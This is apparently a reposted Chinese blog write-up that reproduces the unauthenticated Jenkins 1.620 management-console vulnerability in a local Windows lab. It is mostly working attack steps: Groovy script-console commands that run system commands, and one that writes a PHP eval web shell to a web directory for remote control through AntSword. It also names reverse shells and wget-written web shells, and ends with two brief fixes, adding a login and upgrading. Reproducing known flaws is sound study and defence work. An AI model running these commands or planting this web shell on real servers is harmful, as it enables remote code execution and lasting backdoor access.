0x00 漏洞描述

未授權訪問管理控制台,可以通過腳本命令行執行系統命令。通過該漏洞,可以后台管理服務,通過腳本命令行功能執行系統命令,如反彈shell,wget寫webshell文件。

0x01 漏洞環境搭建（win10）

官方下載jenkins-1.620.zip,下載地址:http://mirrors.jenkins.io

運行setup.exe，安裝即可，安裝成功后在任務管理器中運行jenkins服務

之后訪問http://localhost:8080即可

1、瀏覽器訪問http://localhost:8080/manage,可以看到沒有做任何限制,可以直接訪問

2、點擊”腳本命令行”

3、執行系統命令,下圖看到成功執行系統命令

println "whoami".execute().text

4、利用”腳本命令行”上傳webshell,內容如下:

new File("D:\\phpstudy_pro\\WWW\\ma.php").write('<?php @eval($_POST[cmd]);?>');

成功寫入

5、蟻劍連接

1、對后台控制頁面做登錄驗證限制

2、升級版本

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 漏洞復現 - ZooKeeper未授權訪問漏洞 jenkins未授權訪問漏洞 redis未授權訪問漏洞復現 JBOSS未授權訪問漏洞復現 Redis未授權訪問漏洞復現與利用 ldap未授權訪問漏洞復現 mongodb未授權訪問漏洞復現 rsync未授權訪問漏洞復現寶塔未授權訪問-漏洞復現 Redis未授權訪問漏洞復現